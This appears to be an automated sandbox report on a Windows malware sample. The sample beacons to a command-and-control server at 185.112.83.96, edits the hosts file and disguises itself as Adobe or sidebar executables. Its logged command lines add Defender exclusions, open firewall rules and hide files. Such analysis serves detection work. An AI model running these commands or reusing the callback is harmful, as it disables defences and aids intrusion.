Source: unknown	TCP traffic detected without corresponding DNS query: 185.112.83.96
Source: unknown	TCP traffic detected without corresponding DNS query: 185.112.83.96
Source: unknown	TCP traffic detected without corresponding DNS query: 185.112.83.96
Source: unknown	TCP traffic detected without corresponding DNS query: 185.112.83.96
Source: unknown	TCP traffic detected without corresponding DNS query: 185.112.83.96
Source: unknown	TCP traffic detected without corresponding DNS query: 185.112.83.96
Source: unknown	TCP traffic detected without corresponding DNS query: 185.112.83.96
Source: unknown	TCP traffic detected without corresponding DNS query: 185.112.83.96
Source: unknown	TCP traffic detected without corresponding DNS query: 185.112.83.96
Source: unknown	TCP traffic detected without corresponding DNS query: 185.112.83.96
Source: unknown	TCP traffic detected without corresponding DNS query: 185.112.83.96
Source: unknown	TCP traffic detected without corresponding DNS query: 185.112.83.96
Source: unknown	TCP traffic detected without corresponding DNS query: 185.112.83.96
Source: unknown	TCP traffic detected without corresponding DNS query: 185.112.83.96
Source: unknown	TCP traffic detected without corresponding DNS query: 185.112.83.96
Source: unknown	TCP traffic detected without corresponding DNS query: 185.112.83.96
Source: unknown	TCP traffic detected without corresponding DNS query: 185.112.83.96
Source: unknown	TCP traffic detected without corresponding DNS query: 185.112.83.96
Source: unknown	TCP traffic detected without corresponding DNS query: 185.112.83.96
Source: unknown	TCP traffic detected without corresponding DNS query: 185.112.83.96
Source: unknown	TCP traffic detected without corresponding DNS query: 185.112.83.96

Source: acrotray.exe, acrotray.exe, 00000045.00000002.561046573.0000000000401000.00000040.00020000.sdmp

String found in binary or memory: http://185.112.83.96:20000/callbackmheap.freeSpanLocked

Source: unknown

HTTP traffic detected: POST /callback HTTP/1.1Host: 185.112.83.96:20000User-Agent: Go-http-client/1.1Content-Length: 60Content-Type: application/x-www-form-urlencodedAccept-Encoding: gzipData Raw: 63 61 6c 6c 62 61 63 6b 3d 48 6b 74 67 59 63 6e 6e 25 32 32 43 66 66 67 66 25 32 32 25 32 46 25 32 32 63 65 74 71 76 74 63 25 37 42 26 72 65 67 69 6e 66 6f 3d 57 75 67 74 4d 4b 56 Data Ascii: callback=HktgYcnn%22Cffgf%22%2F%22cetqvtc%7B&reginfo=WugtMKV

Spam, unwanted Advertisements and Ransom Demands:

Modifies the hosts file

Show sources

Source: C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe

File written: C:\Windows\System32\drivers\etc\hosts

Jump to behavior

Source: conhost.exe	Process created: 43
Source: cmd.exe	Process created: 44

System Summary:

Source: C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe

File created: C:\Windows\System32\drivers\etc\hosts

Jump to behavior

Source: C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe

File deleted: C:\Windows\acrotray.exe:Zone.Identifier

Jump to behavior

Source: C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe

File created: C:\Windows\System32\drivers\etc\hosts

Jump to behavior

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\reg.exe reg add "HKCU\Software\Mystic Entertainment" /f

Source: 5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe	Virustotal: Detection: 20%
Source: 5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe	ReversingLabs: Detection: 39%

Source: C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: unknown	Process created: C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe "C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe"
Source: C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp"
Source: C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe	Process created: C:\Windows\System32\cmd.exe cmd /Q /C move /Y C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe C:\Windows\acrotray.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp
Source: C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe	Process created: C:\Windows\System32\cmd.exe cmd /C whoami
Source: C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "netsh advfirewall firewall add rule name=\"acrotray\" dir=in action=allow program=\"C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe\" enable=yes"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\whoami.exe whoami
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh advfirewall firewall add rule name=\"acrotray\" dir=in action=allow program=\"C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe\" enable=yes
Source: C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe	Process created: C:\Windows\System32\cmd.exe cmd /C whoami
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "ipconfig //flushdns"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\whoami.exe whoami
Source: C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe	Process created: C:\Windows\System32\cmd.exe cmd /Q /C reg add "HKCU\Software\Mystic Entertainment" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\ipconfig.exe ipconfig //flushdns
Source: C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "wmic cpu get name"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKCU\Software\Mystic Entertainment" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic cpu get name
Source: C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "attrib +S +H C:\Windows\acrotray.exe"
Source: C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\Microsoft"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\attrib.exe attrib +S +H C:\Windows\acrotray.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "wmic path win32_VideoController get name"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
Source: C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe	Process created: C:\Windows\System32\cmd.exe cmd /C ver
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "wmic path win32_VideoController get name"
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\acrotray.exe "C:\Windows\acrotray.exe"
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp"
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\cmd.exe cmd /Q /C move /Y C:\Windows\acrotray.exe C:\Users\user\AppData\Roaming\Microsoft\sidebar.exe
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\cmd.exe cmd /C whoami
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp
Source: C:\Windows\System32\ipconfig.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\cmd.exe cmd /Q /C reg add "HKCU\Software\Trion Softworks" /f
Source: C:\Windows\System32\ipconfig.exe	Process created: C:\Windows\System32\whoami.exe whoami
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKCU\Software\Trion Softworks" /f
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\cmd.exe cmd /C whoami
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "attrib +S +H C:\Users\user\AppData\Roaming\Microsoft\sidebar.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\whoami.exe whoami
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\Microsoft"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "wmic cpu get name"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\attrib.exe attrib +S +H C:\Users\user\AppData\Roaming\Microsoft\sidebar.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic cpu get name
Source: unknown	Process created: C:\Windows\acrotray.exe "C:\Windows\acrotray.exe"
Source: C:\Windows\System32\whoami.exe	Process created: C:\Windows\System32\cmd.exe cmd /Q /C move /Y C:\Windows\acrotray.exe C:\Users\user\AppData\Roaming\Microsoft\AdobeARM.exe
Source: C:\Windows\System32\whoami.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "wmic path win32_VideoController get name"
Source: C:\Windows\System32\whoami.exe	Process created: C:\Windows\System32\cmd.exe cmd /C whoami
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\whoami.exe	Process created: C:\Windows\System32\cmd.exe cmd /Q /C reg add "HKCU\Software\Mystic Entertainment" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\whoami.exe whoami
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKCU\Software\Mystic Entertainment" /f
Source: C:\Windows\System32\whoami.exe	Process created: C:\Windows\System32\cmd.exe cmd /C whoami
Source: C:\Windows\System32\whoami.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "attrib +S +H C:\Users\user\AppData\Roaming\Microsoft\AdobeARM.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\whoami.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\Microsoft"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\whoami.exe whoami
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\attrib.exe attrib +S +H C:\Users\user\AppData\Roaming\Microsoft\AdobeARM.exe
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\cmd.exe cmd /C ver
Source: C:\Windows\System32\whoami.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "wmic cpu get name"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\reg.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "wmic path win32_VideoController get name"
Source: C:\Windows\System32\reg.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic cpu get name
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
Source: C:\Windows\System32\whoami.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "wmic path win32_VideoController get name"
Source: C:\Windows\System32\whoami.exe	Process created: C:\Windows\System32\cmd.exe cmd /C ver
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\whoami.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "wmic path win32_VideoController get name"
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
Source: C:\Windows\System32\whoami.exe	Process created: C:\Windows\System32\cmd.exe cmd /C whoami
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\cmd.exe cmd /C whoami
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\whoami.exe whoami
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\whoami.exe whoami
Source: C:\Windows\System32\whoami.exe	Process created: C:\Windows\System32\cmd.exe cmd /C whoami
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\cmd.exe cmd /C whoami
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\whoami.exe whoami
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\whoami.exe whoami
Source: C:\Windows\System32\whoami.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "wmic cpu get name"
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "wmic cpu get name"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp"
Source: C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe	Process created: C:\Windows\System32\cmd.exe cmd /Q /C move /Y C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe C:\Windows\acrotray.exe
Source: C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe	Process created: C:\Windows\System32\cmd.exe cmd /C whoami
Source: C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "netsh advfirewall firewall add rule name=\"acrotray\" dir=in action=allow program=\"C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe\" enable=yes"
Source: C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe	Process created: C:\Windows\System32\cmd.exe cmd /C whoami
Source: C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "ipconfig //flushdns"
Source: C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe	Process created: C:\Windows\System32\cmd.exe cmd /Q /C reg add "HKCU\Software\Mystic Entertainment" /f
Source: C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "wmic cpu get name"
Source: C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "attrib +S +H C:\Windows\acrotray.exe"
Source: C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\Microsoft"
Source: C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "wmic path win32_VideoController get name"
Source: C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe	Process created: C:\Windows\System32\cmd.exe cmd /C ver
Source: C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\whoami.exe whoami
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh advfirewall firewall add rule name=\"acrotray\" dir=in action=allow program=\"C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe\" enable=yes
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\whoami.exe whoami
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\ipconfig.exe ipconfig //flushdns
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKCU\Software\Mystic Entertainment" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic cpu get name
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\attrib.exe attrib +S +H C:\Windows\acrotray.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
Source: C:\Windows\acrotray.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp"
Source: C:\Windows\acrotray.exe	Process created: C:\Windows\System32\cmd.exe cmd /Q /C move /Y C:\Windows\acrotray.exe C:\Users\user\AppData\Roaming\Microsoft\sidebar.exe
Source: C:\Windows\acrotray.exe	Process created: C:\Windows\System32\cmd.exe cmd /C whoami
Source: C:\Windows\acrotray.exe	Process created: C:\Windows\System32\cmd.exe cmd /Q /C reg add "HKCU\Software\Trion Softworks" /f
Source: C:\Windows\acrotray.exe	Process created: C:\Windows\System32\cmd.exe cmd /C whoami
Source: C:\Windows\acrotray.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "attrib +S +H C:\Users\user\AppData\Roaming\Microsoft\sidebar.exe"
Source: C:\Windows\acrotray.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\Microsoft"
Source: C:\Windows\acrotray.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "wmic cpu get name"
Source: C:\Windows\acrotray.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "wmic path win32_VideoController get name"
Source: C:\Windows\acrotray.exe	Process created: C:\Windows\System32\cmd.exe cmd /C ver
Source: C:\Windows\acrotray.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "wmic path win32_VideoController get name"
Source: C:\Windows\acrotray.exe	Process created: C:\Windows\System32\cmd.exe cmd /C whoami
Source: C:\Windows\acrotray.exe	Process created: C:\Windows\System32\cmd.exe cmd /C whoami
Source: C:\Windows\acrotray.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "wmic cpu get name"
Source: C:\Windows\acrotray.exe	Process created: unknown unknown
Source: C:\Windows\acrotray.exe	Process created: unknown unknown
Source: C:\Windows\acrotray.exe	Process created: unknown unknown
Source: C:\Windows\acrotray.exe	Process created: unknown unknown
Source: C:\Windows\acrotray.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\acrotray.exe	Process created: unknown unknown
Source: C:\Windows\acrotray.exe	Process created: unknown unknown
Source: C:\Windows\acrotray.exe	Process created: unknown unknown
Source: C:\Windows\acrotray.exe	Process created: unknown unknown
Source: C:\Windows\acrotray.exe	Process created: unknown unknown
Source: C:\Windows\acrotray.exe	Process created: unknown unknown
Source: C:\Windows\acrotray.exe	Process created: unknown unknown
Source: C:\Windows\acrotray.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "wmic path win32_VideoController get name"
Source: C:\Windows\acrotray.exe	Process created: unknown unknown
Source: C:\Windows\acrotray.exe	Process created: unknown unknown
Source: C:\Windows\acrotray.exe	Process created: unknown unknown
Source: C:\Windows\acrotray.exe	Process created: unknown unknown
Source: C:\Windows\acrotray.exe	Process created: unknown unknown
Source: C:\Windows\acrotray.exe	Process created: unknown unknown
Source: C:\Windows\acrotray.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\acrotray.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\whoami.exe whoami
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKCU\Software\Trion Softworks" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\whoami.exe whoami
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\attrib.exe attrib +S +H C:\Users\user\AppData\Roaming\Microsoft\sidebar.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic cpu get name
Source: C:\Windows\acrotray.exe	Process created: C:\Windows\System32\cmd.exe cmd /Q /C move /Y C:\Windows\acrotray.exe C:\Users\user\AppData\Roaming\Microsoft\AdobeARM.exe
Source: C:\Windows\acrotray.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp"
Source: C:\Windows\acrotray.exe	Process created: C:\Windows\System32\cmd.exe cmd /C whoami
Source: C:\Windows\acrotray.exe	Process created: C:\Windows\System32\cmd.exe cmd /Q /C reg add "HKCU\Software\Mystic Entertainment" /f
Source: C:\Windows\acrotray.exe	Process created: C:\Windows\System32\cmd.exe cmd /C whoami
Source: C:\Windows\acrotray.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "attrib +S +H C:\Users\user\AppData\Roaming\Microsoft\AdobeARM.exe"
Source: C:\Windows\acrotray.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\Microsoft"
Source: C:\Windows\acrotray.exe	Process created: C:\Windows\System32\reg.exe reg add "HKCU\Software\Mystic Entertainment" /f
Source: C:\Windows\acrotray.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "wmic path win32_VideoController get name"
Source: C:\Windows\acrotray.exe	Process created: C:\Windows\System32\cmd.exe cmd /C ver
Source: C:\Windows\acrotray.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "wmic path win32_VideoController get name"
Source: C:\Windows\acrotray.exe	Process created: C:\Windows\System32\cmd.exe cmd /C whoami
